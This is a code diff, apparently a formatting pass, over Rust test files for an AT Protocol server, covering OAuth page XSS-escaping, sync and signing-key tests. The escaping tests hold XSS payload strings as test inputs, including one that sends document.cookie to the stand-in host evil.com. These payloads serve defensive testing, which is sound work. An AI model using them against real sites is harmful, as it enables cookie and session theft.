fn test_oauth_template_xss_escaping_scope() {
164
200
let malicious_scope = "\"><script>alert('xss')</script>";
165
-
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
166
-
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
201
+
let html = login_page(
202
+
"client123",
203
+
None,
204
+
Some(malicious_scope),
205
+
"test-uri",
206
+
None,
207
+
None,
208
+
);
209
+
assert!(
210
+
!html.contains("<script>"),
211
+
"Script tags in scope should be escaped"
212
+
);
167
213
}
168
214
169
215
#[test]
170
216
fn test_oauth_template_xss_escaping_error_message() {
171
217
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
172
-
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
173
-
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
218
+
let html = login_page(
219
+
"client123",
220
+
None,
221
+
None,
222
+
"test-uri",
223
+
Some(malicious_error),
224
+
None,
225
+
);
226
+
assert!(
227
+
!html.contains("<script>"),
228
+
"Script tags in error should be escaped"
229
+
);
174
230
}
175
231
176
232
#[test]
177
233
fn test_oauth_template_xss_escaping_login_hint() {
178
234
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
179
-
let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint));
180
-
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
235
+
let html = login_page(
236
+
"client123",
237
+
None,
238
+
None,
239
+
"test-uri",
240
+
None,
241
+
Some(malicious_hint),
242
+
);
243
+
assert!(
244
+
!html.contains("onfocus=\"alert"),
245
+
"Event handlers should be escaped in login hint"
246
+
);
181
247
assert!(html.contains("""), "Quotes should be escaped");
182
248
}
183
249
···
185
251
fn test_oauth_template_xss_escaping_request_uri() {
186
252
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
187
253
let html = login_page("client123", None, None, malicious_uri, None, None);
188
-
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
254
+
assert!(
255
+
!html.contains("onmouseover=\"alert"),
256
+
"Event handlers should be escaped in request_uri"
257
+
);
189
258
}
190
259
191
260
#[test]
···
193
262
let malicious_error = "<script>steal()</script>";
194
263
let malicious_desc = "<img src=x onerror=evil()>";
195
264
let html = error_page(malicious_error, Some(malicious_desc));
196
-
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
197
-
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
265
+
assert!(
266
+
!html.contains("<script>"),
267
+
"Script tags should be escaped in error page"
268
+
);
269
+
assert!(
270
+
!html.contains("<img "),
271
+
"IMG tags should be escaped in error page"
272
+
);
198
273
}
199
274
200
275
#[test]
201
276
fn test_oauth_success_page_xss_escaping() {
202
277
let malicious_name = "<script>steal_session()</script>";
203
278
let html = success_page(Some(malicious_name));
204
-
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
279
+
assert!(
280
+
!html.contains("<script>"),
281
+
"Script tags should be escaped in success page"
282
+
);
205
283
}
206
284
207
285
#[test]
208
286
fn test_oauth_template_no_javascript_urls() {
209
287
let html = login_page("client123", None, None, "test-uri", None, None);
210
-
assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs");
288
+
assert!(
289
+
!html.contains("javascript:"),
290
+
"Login page should not contain javascript: URLs"
291
+
);
211
292
let error_html = error_page("test_error", None);
212
-
assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs");
293
+
assert!(
294
+
!error_html.contains("javascript:"),
295
+
"Error page should not contain javascript: URLs"
296
+
);
213
297
let success_html = success_page(None);
214
-
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
298
+
assert!(
299
+
!success_html.contains("javascript:"),
300
+
"Success page should not contain javascript: URLs"
301
+
);
215
302
}
216
303
217
304
#[test]
218
305
fn test_oauth_template_form_action_safe() {
219
306
let malicious_uri = "javascript:alert('xss')//";
220
307
let html = login_page("client123", None, None, malicious_uri, None, None);
221
-
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
308
+
assert!(
309
+
html.contains("action=\"/oauth/authorize\""),
310
+
"Form action should be fixed URL"
311
+
);
222
312
}
223
313
224
314
#[test]
···
235
325
fn test_send_error_timeout_message() {
236
326
let error = SendError::Timeout;
237
327
let msg = format!("{}", error);
238
-
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
328
+
assert!(
329
+
msg.to_lowercase().contains("timeout"),
330
+
"Timeout error should mention timeout"
331
+
);
239
332
}
240
333
241
334
#[test]
242
335
fn test_send_error_max_retries_includes_detail() {
243
336
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
244
337
let msg = format!("{}", error);
245
-
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
338
+
assert!(
339
+
msg.contains("503") || msg.contains("retries"),
340
+
"MaxRetriesExceeded should include context"
341
+
);
246
342
}
247
343
248
344
#[tokio::test]
···
257
353
.send()
258
354
.await
259
355
.unwrap();
260
-
assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted");
356
+
assert_eq!(
357
+
res.status(),
358
+
reqwest::StatusCode::OK,
359
+
"Session JWTs should be accepted"
360
+
);
261
361
let body: serde_json::Value = res.json().await.unwrap();
262
362
assert_eq!(body["activated"], true);
263
363
}
···
281
381
fn test_html_escape_ampersand() {
282
382
let html = login_page("client&test", None, None, "test-uri", None, None);
283
383
assert!(html.contains("&"), "Ampersand should be escaped");
284
-
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
384
+
assert!(
385
+
!html.contains("client&test"),
386
+
"Raw ampersand should not appear in output"
387
+
);
285
388
}
286
389
287
390
#[test]
288
391
fn test_html_escape_quotes() {
289
392
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
290
-
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
291
-
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
393
+
assert!(
394
+
html.contains(""") || html.contains("""),
395
+
"Double quotes should be escaped"
396
+
);
397
+
assert!(
398
+
html.contains("'") || html.contains("'"),
399
+
"Single quotes should be escaped"
400
+
);
292
401
}
293
402
294
403
#[test]
···
296
405
let html = login_page("client<test>more", None, None, "test-uri", None, None);
297
406
assert!(html.contains("<"), "Less than should be escaped");
298
407
assert!(html.contains(">"), "Greater than should be escaped");
299
-
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
408
+
assert!(
409
+
!html.contains("<test>"),
410
+
"Raw angle brackets should not appear"
411
+
);
300
412
}
301
413
302
414
#[test]
303
415
fn test_oauth_template_preserves_safe_content() {
304
-
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
305
-
assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved");
306
-
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
307
-
assert!(html.contains("user@example.com"), "Login hint should be preserved");
416
+
let html = login_page(
417
+
"my-safe-client",
418
+
Some("My Safe App"),
419
+
Some("read write"),
420
+
"valid-uri",
421
+
None,
422
+
Some("user@example.com"),
423
+
);
424
+
assert!(
425
+
html.contains("my-safe-client") || html.contains("My Safe App"),
426
+
"Safe content should be preserved"
427
+
);
428
+
assert!(
429
+
html.contains("read write") || html.contains("read"),
430
+
"Scope should be preserved"
431
+
);
432
+
assert!(
433
+
html.contains("user@example.com"),
434
+
"Login hint should be preserved"
435
+
);
308
436
}
309
437
310
438
#[test]
311
439
fn test_csrf_like_input_value_protection() {
312
440
let malicious = "\" onclick=\"alert('csrf')";
313
441
let html = login_page("client", None, None, malicious, None, None);
314
-
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
442
+
assert!(
443
+
!html.contains("onclick=\"alert"),
444
+
"Event handlers should not be executable"
445
+
);
315
446
}
316
447
317
448
#[test]
318
449
fn test_unicode_handling_in_templates() {
319
450
let unicode_client = "客户端 クライアント";
320
451
let html = login_page(unicode_client, None, None, "test-uri", None, None);
321
-
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
452
+
assert!(
453
+
html.contains("客户端") || html.contains("&#"),
454
+
"Unicode should be preserved or encoded"
455
+
);
322
456
}
323
457
324
458
#[test]
325
459
fn test_null_byte_in_input() {
326
460
let with_null = "client\0id";
327
461
let sanitized = sanitize_header_value(with_null);
328
-
assert!(sanitized.contains("client"), "Content before null should be preserved");
462
+
assert!(
463
+
sanitized.contains("client"),
464
+
"Content before null should be preserved"
465
+
);
329
466
}
330
467
331
468
#[test]
332
469
fn test_very_long_input_handling() {
333
470
let long_input = "x".repeat(10000);
334
471
let sanitized = sanitize_header_value(&long_input);
335
-
assert!(!sanitized.is_empty(), "Long input should still produce output");
472
+
assert!(
473
+
!sanitized.is_empty(),
474
+
"Long input should still produce output"
475
+
);
336
476
}
+4
-1
tests/server.rs
+4
-1
tests/server.rs
···
244
244
async fn test_get_service_auth_with_lxm() {
245
245
let client = client();
246
246
let (access_jwt, did) = create_account_and_login(&client).await;
247
-
let params = [("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")];
247
+
let params = [
248
+
("aud", "did:web:example.com"),
249
+
("lxm", "com.atproto.repo.getRecord"),
250
+
];
248
251
let res = client
249
252
.get(format!(
250
253
"{}/xrpc/com.atproto.server.getServiceAuth",
+22
-14
tests/signing_key.rs
+22
-14
tests/signing_key.rs
···
1
1
mod common;
2
2
mod helpers;
3
+
use helpers::verify_new_account;
3
4
use reqwest::StatusCode;
4
-
use serde_json::{json, Value};
5
+
use serde_json::{Value, json};
5
6
use sqlx::PgPool;
6
-
use helpers::verify_new_account;
7
7
8
8
async fn get_pool() -> PgPool {
9
9
let conn_str = common::get_db_connection_string().await;
···
91
91
.fetch_one(&pool)
92
92
.await
93
93
.expect("Reserved key not found in database");
94
-
assert_eq!(row.private_key_bytes.len(), 32, "Private key should be 32 bytes for secp256k1");
95
-
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
96
-
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
94
+
assert_eq!(
95
+
row.private_key_bytes.len(),
96
+
32,
97
+
"Private key should be 32 bytes for secp256k1"
98
+
);
99
+
assert!(
100
+
row.used_at.is_none(),
101
+
"Reserved key should not be marked as used yet"
102
+
);
103
+
assert!(
104
+
row.expires_at > chrono::Utc::now(),
105
+
"Key should expire in the future"
106
+
);
97
107
}
98
108
99
109
#[tokio::test]
···
272
282
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
273
283
let body: Value = res.json().await.unwrap();
274
284
assert_eq!(body["error"], "InvalidSigningKey");
275
-
assert!(body["message"]
276
-
.as_str()
277
-
.unwrap()
278
-
.contains("already used"));
285
+
assert!(body["message"].as_str().unwrap().contains("already used"));
279
286
}
280
287
281
288
#[tokio::test]
···
314
321
let did = body["did"].as_str().unwrap();
315
322
let access_jwt = verify_new_account(&client, did).await;
316
323
let res = client
317
-
.get(format!(
318
-
"{}/xrpc/com.atproto.server.getSession",
319
-
base_url
320
-
))
324
+
.get(format!("{}/xrpc/com.atproto.server.getSession", base_url))
321
325
.bearer_auth(&access_jwt)
322
326
.send()
323
327
.await
324
328
.expect("Failed to get session");
325
329
assert_eq!(res.status(), StatusCode::OK);
326
330
let body: Value = res.json().await.unwrap();
327
-
assert_eq!(body["handle"], handle);
331
+
let session_handle = body["handle"].as_str().unwrap();
332
+
assert!(
333
+
session_handle.starts_with(&handle),
334
+
"Session handle should start with requested handle"
335
+
);
328
336
}
+4
-1
tests/sync_blob.rs
+4
-1
tests/sync_blob.rs
···
101
101
let (_, did) = create_account_and_login(&client).await;
102
102
let params = [
103
103
("did", did.as_str()),
104
-
("cid", "bafkreihdwdcefgh4dqkjv67uzcmw7ojee6xedzdetojuzjevtenxquvyku"),
104
+
(
105
+
"cid",
106
+
"bafkreihdwdcefgh4dqkjv67uzcmw7ojee6xedzdetojuzjevtenxquvyku",
107
+
),
105
108
];
106
109
let res = client
107
110
.get(format!(
+14
-3
tests/sync_deprecated.rs
+14
-3
tests/sync_deprecated.rs
···
40
40
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
41
41
let body: Value = res.json().await.expect("Response was not valid JSON");
42
42
assert_eq!(body["error"], "HeadNotFound");
43
-
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
43
+
assert!(
44
+
body["message"]
45
+
.as_str()
46
+
.unwrap()
47
+
.contains("Could not find root")
48
+
);
44
49
}
45
50
46
51
#[tokio::test]
···
257
262
.expect("Failed to get latest commit");
258
263
let latest_body: Value = latest_res.json().await.unwrap();
259
264
let latest_cid = latest_body["cid"].as_str().unwrap();
260
-
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
265
+
assert_eq!(
266
+
head_root, latest_cid,
267
+
"getHead root should match getLatestCommit cid"
268
+
);
261
269
}
262
270
263
271
#[tokio::test]
···
275
283
.expect("Failed to send request");
276
284
assert_eq!(res.status(), StatusCode::OK);
277
285
let body = res.bytes().await.expect("Failed to get body");
278
-
assert!(body.len() >= 2, "CAR file should have at least header length");
286
+
assert!(
287
+
body.len() >= 2,
288
+
"CAR file should have at least header length"
289
+
);
279
290
}
+14
-6
tests/sync_repo.rs
+14
-6
tests/sync_repo.rs
···
404
404
async fn test_sync_record_lifecycle() {
405
405
let client = client();
406
406
let (did, jwt) = setup_new_user("sync-record-lifecycle").await;
407
-
let (post_uri, _post_cid) =
408
-
create_post(&client, &did, &jwt, "Post for sync record test").await;
407
+
let (post_uri, _post_cid) = create_post(&client, &did, &jwt, "Post for sync record test").await;
409
408
let post_rkey = post_uri.split('/').last().unwrap();
410
409
let sync_record_res = client
411
410
.get(format!(
···
453
452
.expect("Failed to get latest commit after");
454
453
let latest_after_body: Value = latest_after.json().await.unwrap();
455
454
let rev_after = latest_after_body["rev"].as_str().unwrap().to_string();
456
-
assert_ne!(rev_before, rev_after, "Revision should change after new record");
455
+
assert_ne!(
456
+
rev_before, rev_after,
457
+
"Revision should change after new record"
458
+
);
457
459
let delete_payload = json!({
458
460
"repo": did,
459
461
"collection": "app.bsky.feed.post",
···
551
553
.expect("Failed to upload blob");
552
554
assert_eq!(upload_res.status(), StatusCode::OK);
553
555
let blob_body: Value = upload_res.json().await.unwrap();
554
-
let blob_cid = blob_body["blob"]["ref"]["$link"].as_str().unwrap().to_string();
556
+
let blob_cid = blob_body["blob"]["ref"]["$link"]
557
+
.as_str()
558
+
.unwrap()
559
+
.to_string();
555
560
let repo_status_res = client
556
561
.get(format!(
557
562
"{}/xrpc/com.atproto.sync.getRepoStatus",
···
583
588
Some("application/vnd.ipld.car")
584
589
);
585
590
let repo_car = get_repo_res.bytes().await.unwrap();
586
-
assert!(repo_car.len() > 100, "Repo CAR should have substantial data");
591
+
assert!(
592
+
repo_car.len() > 100,
593
+
"Repo CAR should have substantial data"
594
+
);
587
595
let list_blobs_res = client
588
596
.get(format!(
589
597
"{}/xrpc/com.atproto.sync.listBlobs",
···
644
652
.and_then(|h| h.to_str().ok()),
645
653
Some("application/vnd.ipld.car")
646
654
);
647
-
}
655
+
}
+21
-6
tests/verify_live_commit.rs
+21
-6
tests/verify_live_commit.rs
···
5
5
mod common;
6
6
7
7
#[tokio::test]
8
+
#[ignore = "depends on external live server state; run manually with --ignored"]
8
9
async fn test_verify_live_commit() {
9
10
let client = reqwest::Client::new();
10
11
let did = "did:plc:zp3oggo2mikqntmhrc4scby4";
11
12
let resp = client
12
-
.get(format!("https://testpds.wizardry.systems/xrpc/com.atproto.sync.getRepo?did={}", did))
13
+
.get(format!(
14
+
"https://testpds.wizardry.systems/xrpc/com.atproto.sync.getRepo?did={}",
15
+
did
16
+
))
13
17
.send()
14
18
.await
15
19
.expect("Failed to fetch repo");
16
-
assert!(resp.status().is_success(), "getRepo failed: {}", resp.status());
20
+
assert!(
21
+
resp.status().is_success(),
22
+
"getRepo failed: {}",
23
+
resp.status()
24
+
);
17
25
let car_bytes = resp.bytes().await.expect("Failed to read body");
18
26
println!("CAR bytes: {} bytes", car_bytes.len());
19
27
let mut cursor = std::io::Cursor::new(&car_bytes[..]);
···
23
31
assert!(!roots.is_empty(), "No roots in CAR");
24
32
let root_cid = roots[0];
25
33
let root_block = blocks.get(&root_cid).expect("Root block not found");
26
-
let commit = jacquard_repo::commit::Commit::from_cbor(root_block).expect("Failed to parse commit");
34
+
let commit =
35
+
jacquard_repo::commit::Commit::from_cbor(root_block).expect("Failed to parse commit");
27
36
println!("Commit DID: {}", commit.did().as_str());
28
37
println!("Commit rev: {}", commit.rev());
29
38
println!("Commit prev: {:?}", commit.prev());
···
37
46
println!("DID doc: {}", did_doc_text);
38
47
let did_doc: jacquard::common::types::did_doc::DidDocument<'_> =
39
48
serde_json::from_str(&did_doc_text).expect("Failed to parse DID doc");
40
-
let pubkey = did_doc.atproto_public_key()
49
+
let pubkey = did_doc
50
+
.atproto_public_key()
41
51
.expect("Failed to get public key")
42
52
.expect("No public key");
43
53
println!("Public key codec: {:?}", pubkey.codec);
···
75
85
serde_ipld_dagcbor::to_vec(&unsigned).unwrap()
76
86
}
77
87
78
-
fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
88
+
fn parse_car(
89
+
cursor: &mut std::io::Cursor<&[u8]>,
90
+
) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
79
91
use std::io::Read;
80
92
fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {
81
93
let mut result = 0u64;
···
126
138
let hash_type = bytes[2];
127
139
let hash_len = bytes[3] as usize;
128
140
let cid_len = 4 + hash_len;
129
-
let cid = Cid::new_v1(codec as u64, cid::multihash::Multihash::from_bytes(&bytes[2..cid_len])?);
141
+
let cid = Cid::new_v1(
142
+
codec as u64,
143
+
cid::multihash::Multihash::from_bytes(&bytes[2..cid_len])?,
144
+
);
130
145
Ok((cid, cid_len))
131
146
} else {
132
147
Err("Unsupported CID version".into())